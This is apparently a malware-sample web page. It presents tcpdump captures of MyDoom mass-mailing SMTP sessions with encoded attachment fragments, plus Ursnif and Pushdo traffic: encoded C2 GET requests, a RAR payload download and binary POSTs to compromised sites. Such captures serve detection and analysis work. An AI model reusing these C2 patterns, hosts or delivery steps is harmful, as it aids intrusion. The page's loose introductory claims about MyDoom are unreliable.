Text Example

MyDoom DDoS $38 Billion Dollar P2P Malware Botnet PCAP Download Traffic Sample

MyDoom Botnet

MyDoom has several methods of impact, but its main attacks are DDoS.
MyDoom uses a DGA for its P2P communications, but also uses some command and control servers.

Mydoom, the fastest-spreading malware, caused an estimated $38.7 billion in damage to Microsoft Windows-based computers. Spyware is a deadly form of malware that extracts a company's confidential information without the company's awareness.

2019-07-15 13:00:22.289866 IP 10.7.15.101.51171 > 10.7.15.1.53: 48767+ MX? acm.org. (25)
E..5……..
..e
……5.!X…………..acm.org…..
2019-07-15 13:00:22.340366 IP 10.7.15.1.53 > 10.7.15.101.51171: 48767 1/0/0 MX mail.mailroute.net. 10 (59)
E..W…….G

..e.5…C……………acm.org………………
.mail mailroute.net.
2019-07-15 13:00:22.348650 IP 10.7.15.101.53658 > 10.7.15.1.53: 65013+ A? mail.mailroute.net. (36)
E..@……..
..e
……5.,$_………….mail mailroute.net…..
2019-07-15 13:00:22.382026 IP 10.7.15.1.53 > 10.7.15.101.53658: 65013 2/0/0 A 199.89.1.120, A 199.89.3.120 (68)
E.........= ... ..e.5...L...............mail mailroute.net..................Y.x.............Y.x
2019-07-15 13:00:22.382637 IP 10.7.15.101.49163 > 199.89.1.120.25: Flags [S], seq 3423424506, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@..... ..e.Y.x......O....... .................
2019-07-15 13:00:22.501570 IP 199.89.1.120.25 > 10.7.15.101.49163: Flags [S.], seq 2591540629, ack 3423424507, win 64240, options [mss 1460], length 0
E..,......O..Y.x ..e.....w....O.…~…….
2019-07-15 13:00:22.501779 IP 10.7.15.101.49163 > 199.89.1.120.25: Flags [.], ack 1, win 64240, length 0
E..(..@…..
..e.Y.x……O..w..P….j..
2019-07-15 13:00:22.824195 IP 199.89.1.120.25 > 10.7.15.101.49163: Flags [P.], seq 1:66, ack 1, win 64240, length 65: SMTP: 220-in-014.lax.mailroute.net ESMTP Postfix - Postscreen enabled
E..i……Ot.Y.x
..e…..w….O.P…5…220-in-014.lax.mailroute.net ESMTP Postfix - Postscreen enabled

2019-07-15 13:00:22.928682 IP 10.7.15.101.49163 > 199.89.1.120.25: Flags [.], ack 66, win 64175, length 0
E..(..@…..
..e.Y.x……O..w..P….j..
2019-07-15 13:00:24.456432 IP 10.7.15.101.49164 > 157.130.29.226.1042: Flags [S], seq 824150712, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…%;
..e……..1……… ..I…………..
2019-07-15 13:00:24.924489 IP 10.7.15.101.62796 > 10.7.15.1.53: 51271+ MX? lists.freedesktop.org. (39)
E..C…….}
..e
….L.5./…G………..lists.freedesktop.org…..
2019-07-15 13:00:24.988231 IP 10.7.15.101.53695 > 10.7.15.1.53: 22968+ MX? global.libreoffice.org. (40)
E..D…….{
..e
……5.0..Y…………global.libreoffice.org…..
2019-07-15 13:00:25.049108 IP 10.7.15.101.57533 > 10.7.15.1.53: 46764+ MX? global.libreoffice.org. (40)
E..D…….z
..e
……5.0……………global.libreoffice.org…..
2019-07-15 13:00:25.112279 IP 10.7.15.101.61829 > 10.7.15.1.53: 57956+ MX? documentfoundation.org. (40)
E..D…….y
..e
……5.09..d………..documentfoundation.org…..
2019-07-15 13:00:25.174765 IP 10.7.15.101.53237 > 10.7.15.1.53: 64071+ MX? libreoffice.org. (33)
E..=……..
..e
……5.)[u.G………..libreoffice.org…..
2019-07-15 13:00:25.237468 IP 10.7.15.101.50685 > 10.7.15.1.53: 56734+ MX? libreoffice.org. (33)
E..=…….~
..e
……5.)……………libreoffice.org…..
2019-07-15 13:00:25.939540 IP 10.7.15.101.62796 > 10.7.15.1.53: 51271+ MX? lists.freedesktop.org. (39)
E..C…….w
..e
….L.5./…G………..lists.freedesktop.org…..
2019-07-15 13:00:26.001128 IP 10.7.15.101.53695 > 10.7.15.1.53: 22968+ MX? global.libreoffice.org. (40)
E..D…….u
..e
……5.0..Y…………global.libreoffice.org…..
2019-07-15 13:00:26.062827 IP 10.7.15.101.57533 > 10.7.15.1.53: 46764+ MX? global.libreoffice.org. (40)
E..D…….t
..e
……5.0……………global.libreoffice.org…..
2019-07-15 13:00:26.126226 IP 10.7.15.101.61829 > 10.7.15.1.53: 57956+ MX? documentfoundation.org. (40)
E..D…….s
..e
……5.09..d………..documentfoundation.org…..
2019-07-15 13:00:26.187392 IP 10.7.15.101.53237 > 10.7.15.1.53: 64071+ MX? libreoffice.org. (33)
E..=…….y
2019-07-15 13:00:30.460095 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [P.], seq 1:54, ack 1, win 64240, length 53: SMTP: 220 gabe.freedesktop.org ESMTP Postfix (Debian/GNU)
E..]…………
..e….]`.k…
P….h..220 gabe.freedesktop.org ESMTP Postfix (Debian/GNU)

2019-07-15 13:00:30.460605 IP 10.7.15.101.49165 > 131.252.210.177.25: Flags [P.], seq 1:15, ack 54, win 64187, length 14: SMTP: EHLO acm.org
E..6..@…..
..e………..
]`..P….T..EHLO acm.org

2019-07-15 13:00:30.460715 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [.], ack 15, win 64240, length 0
E..(…………
..e….]......P....n..
2019-07-15 13:00:30.541199 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [S.], seq 678655145, ack 2272612538, win 64240, options [mss 1460], length 0
E..,......y.Y.D. ..e....(st..uP.………..
2019-07-15 13:00:30.541436 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [.], ack 1, win 64240, length 0
E..(..@…A.
..eY.D……uP.(st.P….R..
2019-07-15 13:00:30.601674 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [P.], seq 54:197, ack 15, win 64240, length 143: SMTP: 250-gabe.freedesktop.org
E……….?….
..e….]`……P…%]..250-gabe.freedesktop.org
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN

2019-07-15 13:00:30.602630 IP 10.7.15.101.49165 > 131.252.210.177.25: Flags [P.], seq 15:43, ack 197, win 64044, length 28: SMTP: MAIL FROM:<fdrake@acm.org>
E..D..@…..
..e…………]`./P..,QQ..MAIL FROM:<fdrake@acm.org>

2019-07-15 13:00:30.602753 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [.], ack 43, win 64240, length 0
E..(…………
..e….]./...4P.......
2019-07-15 13:00:30.735767 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [P.], seq 197:211, ack 43, win 64240, length 14: SMTP: 250 2.1.0 Ok
E..6............ ..e....]./…4P…nf..250 2.1.0 Ok

2019-07-15 13:00:30.736105 IP 10.7.15.101.49165 > 131.252.210.177.25: Flags [P.], seq 43:88, ack 211, win 64030, length 45: SMTP: RCPT TO:<libreoffice@lists.freedesktop.org>
E..U..@…..
..e………..4]`.=P…….RCPT TO:<libreoffice@lists.freedesktop.org>

2019-07-15 13:00:30.736205 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [.], ack 88, win 64240, length 0
E..(…………
..e….]`.=…aP…….
2019-07-15 13:00:31.087379 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 1:62, ack 1, win 64240, length 61: SMTP: 220 vm194.documentfoundation.org ESMTP Postfix (Debian/GNU)
E..e……y.Y.D.
..e….(st..uP.P…….220 vm194.documentfoundation.org ESMTP Postfix (Debian/GNU)

2019-07-15 13:00:31.087804 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [P.], seq 1:30, ack 62, win 64179, length 29: SMTP: EHLO global.libreoffice.org
E..E..@…A.
..eY.D……uP.(st.P….l..EHLO global.libreoffice.org

2019-07-15 13:00:31.087907 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [.], ack 30, win 64240, length 0
E..(……y.Y.D.
..e….(st..uP.P…….
2019-07-15 13:00:31.270207 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 62:203, ack 30, win 64240, length 141: SMTP: 250-vm194.documentfoundation.org
E………y9Y.D.
..e….(st..uP.P…….250-vm194.documentfoundation.org
250-PIPELINING
250-SIZE 41943040
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN

2019-07-15 13:00:31.271261 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [P.], seq 30:77, ack 203, win 64038, length 47: SMTP: MAIL FROM:<postmaster@global.libreoffice.org>
E..W..@…A.
..eY.D……uP.(sutP..&….MAIL FROM:<postmaster@global.libreoffice.org>

2019-07-15 13:00:31.271380 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [.], ack 77, win 64240, length 0
E..(……y.Y.D.
..e….(sut.uQ.P….<..
2019-07-15 13:00:31.481963 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 203:217, ack 77, win 64240, length 14: SMTP: 250 2.1.0 Ok
E..6……y.Y.D.
..e….(sut.uQ.P…s…250 2.1.0 Ok

2019-07-15 13:00:31.482279 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [P.], seq 77:121, ack 217, win 64024, length 44: SMTP: RCPT TO:<marketing@global.libreoffice.org>
E..T..@…A.
..eY.D……uQ.(su.P….2..RCPT TO:<marketing@global.libreoffice.org>

2019-07-15 13:00:31.482382 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [.], ack 121, win 64240, length 0
E..(……y.Y.D.
..e….(su..uQ2P…….
2019-07-15 13:00:31.686040 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 217:291, ack 121, win 64240, length 74: SMTP: 450 4.7.25 Client host rejected: cannot find your hostname, [173.46.3.9]
E..r……yxY.D.
..e….(su..uQ2P….e..450 4.7.25 Client host rejected: cannot find your hostname, [173.46.3.9]
2019-07-15 13:01:10.499434 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15417, win 64240, length 0
E..(……48.F(g
..e…;….D…P…]…
2019-07-15 13:01:10.499471 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15417:15490, ack 277, win 63964, length 73: SMTP: CsT9qUFJrxQMiBqS5+ujrJr2AxIIs09LsG+iA3CPkMqtdS2sgcamxnnGrtA4ivDGLtbED1P
E..q.*@….C
..e.F(g.;..D…….P…….CsT9qUFJrxQMiBqS5+ujrJr2AxIIs09LsG+iA3CPkMqtdS2sgcamxnnGrtA4ivDGLtbED1P

2019-07-15 13:01:10.499509 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15490, win 64240, length 0
E..(……47.F(g
..e…;….D..5P…]z..
2019-07-15 13:01:10.499581 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15490:15568, ack 277, win 63964, length 78: SMTP: E7QcAFvXa9SwaF1MA+25XC6Xb+5j72HwbPEgNsvlcvJT82X0dPX2abBcLrdR9274Z/lz+rkty1Y9
E..v.+@….=
..e.F(g.;..D..5….P…FB..E7QcAFvXa9SwaF1MA+25XC6Xb+5j72HwbPEgNsvlcvJT82X0dPX2abBcLrdR9274Z/lz+rkty1Y9

2019-07-15 13:01:10.499614 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15568, win 64240, length 0
E..(……46.F(g
..e…;….D…P…],..
2019-07-15 13:01:10.499657 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15568:15646, ack 277, win 63964, length 78: SMTP: VGVtRtNw2zXLZtTVctbXB9h5Stc122bZ2kk629xG3S9X13Vd3hvfD+AL4RPixF3TNE3j5OXm52Lo
E..v.,@….<
..e.F(g.;..D…….P….*..VGVtRtNw2zXLZtTVctbXB9h5Stc122bZ2kk629xG3S9X13Vd3hvfD+AL4RPixF3TNE3j5OXm52Lo

2019-07-15 13:01:10.499691 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15646, win 64240, length 0
E..(……45.F(g
..e…;….D…P……
2019-07-15 13:01:10.499734 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15646:15724, ack 277, win 63964, length 78: SMTP: ayRiB6m+hApMrsThtQk5GBJlW44m81qQKIQEp2QE4j0jTGYk/2GSAblMTNfzYTeCklCW7FAxj2Rb
E..v.-@….;
..e.F(g.;..D…….P….O..ayRiB6m+hApMrsThtQk5GBJlW44m81qQKIQEp2QE4j0jTGYk/2GSAblMTNfzYTeCklCW7FAxj2Rb

2019-07-15 13:01:10.499767 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15724, win 64240, length 0
E..(……44.F(g
..e…;….D…P……
2019-07-15 13:01:10.499810 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15724:15803, ack 277, win 63964, length 79: SMTP: 2NcgGtBqBSLnY giJR0CBABxailQGXkwC0KBXZVbPzoFEy/y8ip3S5Nl4Dcv9kIc7Nsh3/GkPxg5D
E..w..@….9
..e.F(g.;..D…….P…l…2NcgGtBqBSLnY giJR0CBABxailQGXkwC0KBXZVbPzoFEy/y8ip3S5Nl4Dcv9kIc7Nsh3/GkPxg5D

2019-07-15 13:01:10.499843 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15803, win 64240, length 0
E..(……43.F(g
..e…;….D..nP…\A..
2019-07-15 13:01:10.499885 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15803:15852, ack 277, win 63964, length 49: SMTP: Wd5SdLNn/C0eKzCNUzbpLcJolBHSO1nx/hqx/g+lBVp+vKY
E..Y./@….V
..e.F(g.;..D..n….P…….Wd5SdLNn/C0eKzCNUzbpLcJolBHSO1nx/hqx/g+lBVp+vKY

2019-07-15 13:01:10.499919 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15852, win 64240, length 0
E..(……42.F(g
..e…;….D…P……
2019-07-15 13:01:10.499962 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15852:15874, ack 277, win 63964, length 22: SMTP: WwwouqTVQl4axZk+9NR8
E..>.0@….p
..e.F(g.;..D…….P….s..WwwouqTVQl4axZk+9NR8

2019-07-15 13:01:10.499995 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15874, win 64240, length 0
E..(……41.F(g
..e…;….D…P…[…
2019-07-15 13:01:10.500037 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15874:15886, ack 277, win 63964, length 12: SMTP: fFly N+umw
E..4.1@….y
..e.F(g.;..D…….P…….fFly N+umw

Ursnif and Pushdo Trojan DDoS Botnet Malware Infection PCAP file download traffic sample

2019-07-29 12:48:13.981152 IP 10.7.29.101.49158 > 185.244.213.113.443: Flags [P.], seq 1:118, ack 1, win 64240, length 117
E….]@…C,
..e…q….r.Z…..P………..p…l..]=…A..}}.5T+…M%…$…Lr*,.6…./.5…
….. .
.2.8…….+…………..riuytessl.xyz.
…………..
2019-07-29 12:48:13.981273 IP 185.244.213.113.443 > 10.7.29.101.49158: Flags [.], ack 118, win 64240, length 0
E..(…….t…q
..e……..r.Z.P…EP..
2019-07-29 12:48:14.192305 IP 185.244.213.113.443 > 10.7.29.101.49158: Flags [P.], seq 1:1383, ack 118, win 64240, length 1382
E…………..q
10.7.29.101.49158: Flags [.], seq 1383:2843, ack 118, win 64240, length 1460

2019-07-29 12:52:10.719361 IP 10.7.29.101.49161 > 40.76.4.15.80: Flags [P.], seq 1:458, ack 1, win 64240, length 457: HTTP: GET /images/zIbeJIvqUUkX/kB7HNwBuSwR/ygaZ_2FJcEM1Uu/ZIwIpN519Vcad9tkWkAGe/fZrzfJsmSKQLtF2J/827S1NiugG_2B1e/NbD1r9FXrSGs_2FU20/_2FkMZhz8/4N6SI9UeCx3MN4wr4bOt/SJ6LOD6Rida5wk8ujR6/K3h.avi HTTP/1.1
E….*@…..
..e(L… .P.YQ.8.+9P…7F..GET /images/zIbeJIvqUUkX/kB7HNwBuSwR/ygaZ_2FJcEM1Uu/ZIwIpN519Vcad9tkWkAGe/fZrzfJsmSKQLtF2J/827S1NiugG_2B1e/NbD1r9FXrSGs_2FU20/_2FkMZhz8/4N6SI9UeCx3MN4wr4bOt/SJ6LOD6Rida5wk8ujR6/K3h.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko/20100101 Firefox/12.0
Accept-Encoding: gzip, deflate
Host: microsoft.com
DNT: 1
Connection: Keep-Alive

2019-07-29 12:52:10.719447 IP 40.76.4.15.80 > 10.7.29.101.49161: Flags [.], ack 458, win 64240, length 0
E..(……Aw(L..
..e.P. 8.+9.YS.P…….
2019-07-29 12:52:10.807321 IP 40.76.4.15.80 > 10.7.29.101.49161: Flags [P.], seq 1:325, ack 458, win 64240, length 324: HTTP: HTTP/1.1 301 Moved Permanently
E..l……@2(L..
..e.P. 8.+9.YS.P…….HTTP/1.1 301 Moved Permanently
Date: Mon, 29 Jul 2019 16:52:10 GMT
Server: Kestrel
Content-Length: 0
Location: https://www.microsoft.com/images/zIbeJIvqUUkX/kB7HNwBuSwR/ygaZ_2FJcEM1Uu/ZIwIpN519Vcad9tkWkAGe/fZrzfJsmSKQLtF2J/827S1NiugG_2B1e/NbD1r9FXrSGs_2FU20/_2FkMZhz8/4N6SI9UeCx3MN4wr4bOt/SJ6LOD6Rida5wk8ujR6/K3h.avi

2019-07-29 12:53:39.848186 IP 10.7.29.101.49234 > 46.21.147.29.80: Flags [P.], seq 1:438, ack 1, win 64240, length 437: HTTP: GET /images/n4zofhavQgNnJWOdBQ0/nPKAARUazfT3JA1eP9tpCw/HdIhYDqCQpUHz/_2BSSI3R/phBSl6Ce_2Bs0W_2BD7POgC/GmZq5N6N1r/keTipeJU9vv_2BLiU/pOuusTuOjboG/UB_2BmP7hsa/w71kdYG5ZOIMUr/gCbHKq37/FZ3.avi HTTP/1.1
E…..@…
}
..e…..R.P..V_q5s8P…K…GET /images/n4zofhavQgNnJWOdBQ0/nPKAARUazfT3JA1eP9tpCw/HdIhYDqCQpUHz/_2BSSI3R/phBSl6Ce_2Bs0W_2BD7POgC/GmZq5N6N1r/keTipeJU9vv_2BLiU/pOuusTuOjboG/UB_2BmP7hsa/w71kdYG5ZOIMUr/gCbHKq37/FZ3.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 46.21.147.29
DNT: 1
Connection: Keep-Alive

2019-07-29 12:53:39.848277 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], ack 438, win 64240, length 0
E..(…………
..e.P.Rq5s8..X.P…2…
2019-07-29 12:53:40.046606 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [P.], seq 1:1383, ack 438, win 64240, length 1382: HTTP: HTTP/1.1 200 OK
E……….2….
..e.P.Rq5s8..X.P…P…HTTP/1.1 200 OK
Date: Tue, 30 Jul 2019 01:16:14 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Set-Cookie: PHPSESSID=i52pvsrt089bi7i3umb88bd400; path=/; domain=.irwhfgowe.xyz
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang=en; expires=Thu, 29-Aug-2019 01:16:14 GMT; path=/; domain=.irwhfgowe.xyz
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

355bc
2019-07-29 12:53:40.046704 IP 10.7.29.101.49234 > 46.21.147.29.80: Flags [.], ack 1383, win 62858, length 0
E..(..@….0
..e…..R.P..X.q5x.P…2…
2019-07-29 12:53:40.048505 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 1383:2843, ack 438, win 64240, length 1460: HTTP
E……………
..e.P.Rq5x…X.P…H;..
2019-07-29 12:53:40.048521 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 2843:4303, ack 438, win 64240, length 1460: HTTP
E……………
..e.P.Rq5~R..X.P….N..

2019-07-29 12:53:43.474193 IP 10.7.29.101.49234 > 46.21.147.29.80: Flags [P.], seq 1076:1511, ack 500659, win 64240, length 435: HTTP: GET /images/_2B4OwFC/6vjfFP_2B9uEz70SydULkkQ/V6jakRAWYD/AOLjnZYCVGOTKqeQQ/jEaRE2qFGZsu/lTmxprbzXB2/42A_2FkdM3tNun/gLYbeGst8_2BWnKGu7mGT/ZW8gMjxsJDmd0ZZG/9PzwD2p8rTJNi6b/XP71k6bvIt/7.avi HTTP/1.1
E…..@… .
..e…..R.P..Z.q=..P…….GET /images/_2B4OwFC/6vjfFP_2B9uEz70SydULkkQ/V6jakRAWYD/AOLjnZYCVGOTKqeQQ/jEaRE2qFGZsu/lTmxprbzXB2/42A_2FkdM3tNun/gLYbeGst8_2BWnKGu7mGT/ZW8gMjxsJDmd0ZZG/9PzwD2p8rTJNi6b/XP71k6bvIt/7.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 46.21.147.29
DNT: 1
Connection: Keep-Alive

2019-07-29 12:53:43.474326 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], ack 1511, win 64240, length 0
E..(…….+….
..e.P.Rq=….\EP….0..
2019-07-29 12:53:43.681682 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 500659:502119, ack 1511, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E……….v….
..e.P.Rq=….\EP…….HTTP/1.1 200 OK
Date: Tue, 30 Jul 2019 01:16:17 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Set-Cookie: PHPSESSID=nthmmr62j6fsaf2hggojf13s20; path=/; domain=.irwhfgowe.xyz
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang=en; expires=Thu, 29-Aug-2019 01:16:17 GMT; path=/; domain=.irwhfgowe.xyz
Content-Length: 2480
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2019-07-29 12:53:43.681709 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 502119:503579, ack 1511, win 64240, length 1460: HTTP
E……….u….
..e.P.Rq=….\EP…….

2019-07-29 13:00:51.068034 IP 10.7.29.101.49247 > 109.123.223.76.80: Flags [P.], seq 1:179, ack 1, win 64240, length 178: HTTP: GET /demo/PhotoA.rar HTTP/1.1
E…..@…~.
..em{.L._.P…… 6P…)…GET /demo/PhotoA.rar HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)
Host: kacafirek.cz
Connection: Keep-Alive
Cache-Control: no-cache

2019-07-29 13:00:51.068133 IP 109.123.223.76.80 > 10.7.29.101.49247: Flags [.], ack 179, win 64240, length 0
E..(……..m{.L
..e.P... 6…XP…z…
2019-07-29 13:00:51.258107 IP 109.123.223.76.80 > 10.7.29.101.49247: Flags [.], seq 1:1461, ack 179, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E……….4m{.L ..e.P... 6…XP…….HTTP/1.1 200 OK
Date: Mon, 29 Jul 2019 17:00:51 GMT
Server: Apache
Last-Modified: Mon, 29 Jul 2019 08:06:23 GMT
ETag: "e60124-3eea3-58ecd5e2cfdc0"
Accept-Ranges: bytes
Content-Length: 257699
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-rar-compressed

2019-07-29 13:00:58.982371 IP 10.7.29.101.53764 > 172.16.5.2.53: 23168+ A? www.vitaindu.com. (34)
E..>.-….Z.
..e…….5..DZ…………www.vitaindu.com…..
2019-07-29 13:00:58.982627 IP 10.7.29.101.63732 > 172.16.5.2.53: 20475+ A? www.pr-park.com. (33)
E..=……Z. ..e…….5.)..O…………www.pr-park.com…..
2019-07-29 13:00:58.982894 IP 10.7.29.101.65154 > 172.16.5.2.53: 28480+ A? www.2print.com. (32)
E..<./….Z. ..e…….5.(..o@………..www.2print.com…..
2019-07-29 13:00:58.984127 IP 10.7.29.101.54427 > 172.16.5.2.53: 60399+ A? www.crcsi.org. (31)
E..;.1….Z. ..e…….5.’.k………….www.crcsi.org…..
2019-07-29 13:00:58.987089 IP 10.7.29.101.49386 > 172.16.5.2.53: 17994+ A? www.spanesi.com. (33)
E..=.2….Z. ..e…….5.).PFJ………..www.spanesi.com…..
2019-07-29 13:00:58.987781 IP 10.7.29.101.58486 > 172.16.5.2.53: 43542+ A? www.owsports.ca. (33)
E..=.3….Y. ..e…..v.5.).A………….www.owsports.ca…..
2019-07-29 13:00:58.989882 IP 10.7.29.101.54356 > 172.16.5.2.53: 39383+ A? www.rs-ag.com. (31)
E..;.4….Z. ..e…..T.5.’……………www.rs-ag.com…..
2019-07-29 13:00:58.991007 IP 10.7.29.101.60036 > 172.16.5.2.53: 34096+ A? www.c9dd.com. (30)
E..:.5….Z. ..e…….5.&…0………..www.c9dd.com…..
2019-07-29 13:00:58.992556 IP 10.7.29.101.53486 > 172.16.5.2.53: 64159+ A? www.udesign.biz. (33)
E..=.6….Y. ..e…….5.))…………..www.udesign.biz…..
2019-07-29 13:00:58.993571 IP 10.7.29.101.57888 > 172.16.5.2.53: 32553+ A? wpad.localdomain. (34)
E..>.7….Y. ..e….. .5.p..)………..wpad.localdomain…..
2019-07-29 13:00:59.054760 IP 172.16.5.2.53 > 10.7.29.101.58486: 43542 2/0/0 A 198.105.254.64, A 198.105.244.64 (65)
E..].r……….
..e.5.v.I……………www.owsports.ca………………i.@………….i.@
2019-07-29 13:00:59.058581 IP 10.7.29.101.49248 > 198.105.254.64.80: Flags [S], seq 1756324796, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.8@….v
..e.i.@..Ph.c....... .................
2019-07-29 13:00:59.059556 IP 172.16.5.2.53 > 10.7.29.101.53486: 64159 2/0/0 A 198.105.254.64, A 198.105.244.64 (65)
E..].s.......... ..e.5...I$..............www.udesign.biz..................i.@.............i.@
2019-07-29 13:00:59.060024 IP 10.7.29.101.49249 > 198.105.254.64.80: Flags [S], seq 331088107, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.9@....u ..e.i.@.a.P.......... .................
2019-07-29 13:00:59.070348 IP 172.16.5.2.53 > 10.7.29.101.49386: 17994 2/2/4 A 104.26.2.86, A 104.26.3.86 (204)
E....t.......... ..e.5....P.FJ...........www.spanesi.com.................h..V............h..V.............jean.ns cloudflare...............ben.R.n............;g.n..........$... I........;g.M............:y.M..........$... I........:y
2019-07-29 13:00:59.070711 IP 10.7.29.101.49250 > 104.26.2.86.80: Flags [S], seq 4069494565, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.:@....
..eh..V.b.P…%…… .z……………
2019-07-29 13:00:59.083033 IP 172.16.5.2.53 > 10.7.29.101.54356: 39383 2/2/4 A 104.31.73.201, A 104.31.72.201 (203)
E….u……….
..e.5.T……………..www.rs-ag.com……………..h.I………….h.H…………..karl.ns
cloudflare……………jade.P.K…………;..K……….$… I……..;..l…………:..l……….$… I……..:.
2019-07-29 13:00:59.083341 IP 10.7.29.101.49251 > 104.31.73.201.80: Flags [S], seq 4209286921, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.;@….5
..eh.I..c.P… …… ……………..
2019-07-29 13:00:59.092781 IP 172.16.5.2.53 > 10.7.29.101.60036: 34096 2/2/4 A 104.25.152.27, A 104.25.153.27 (202)
E….v……….
..e.5…….0………..www.c9dd.com……………..h……………h…………….rita.ns
cloudflare……………west.O.J…………:..J……….$… I……..:..k…………;..k……….$… I……..;.
2019-07-29 13:00:59.093130 IP 10.7.29.101.49252 > 104.25.152.27.80: Flags [S], seq 2628897602, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.<@….. ..eh….d.P…B…… ……………..
2019-07-29 13:00:59.124030 IP 172.16.5.2.53 > 10.7.29.101.54427: 60399 2/2/4 CNAME crcsi.org., A 198.12.145.135 (204)
E….w……….
..e.5….h)………….www.crcsi.org…………………………………………ns56.domaincontrol.com…………..ns55.N.I…………K..I……….&…”…………m……….aJk..m……….&…!………..
2019-07-29 13:00:59.124420 IP 10.7.29.101.49253 > 198.12.145.135.80: Flags [S], seq 3693053252, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.=@…s.
..e…..e.P…D…… ……………..
2019-07-29 13:00:59.134787 IP 104.26.2.86.80 > 10.7.29.101.49250: Flags [S.], seq 1144726242, ack 4069494566, win 64240, options [mss 1460], length 0
E..,.x…..wh..V
..e.P.bD;”….&...a.......
2019-07-29 13:00:59.134962 IP 10.7.29.101.49250 > 104.26.2.86.80: Flags [.], ack 1, win 64240, length 0
E..(.>@....
..eh..V.b.P…&D;”.P…y…
2019-07-29 13:00:59.135089 IP 10.7.29.101.49250 > 104.26.2.86.80: Flags [P.], seq 1:771, ack 1, win 64240, length 770: HTTP: POST / HTTP/1.1
E..*.?@…].
..eh..V.b.P…&D;”.P…….POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 536
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.spanesi.com
Cache-Control: no-cache

